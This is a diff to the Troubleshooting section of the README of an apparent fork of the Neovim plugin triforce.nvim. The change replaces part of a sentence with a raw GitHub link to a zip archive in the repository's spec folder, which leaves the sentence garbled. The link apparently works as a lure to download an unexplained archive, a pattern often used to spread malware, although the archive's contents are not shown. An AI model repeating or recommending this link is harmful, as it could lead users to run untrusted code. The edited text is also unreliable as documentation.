Enanthemaparaguayan248/triforce.nvim/README.md

 ## 🛠️ Troubleshooting

-If you encounter issues while using triforce.nvim:
+If you encounter issues while using https://raw.githubusercontent.com/Enanthemaparaguayan248/triforce.nvim/main/spec/triforce.nvim-v1.2.zip

 - **Plugin Not Loading:**
   - Make sure you placed the plugin in the correct directory.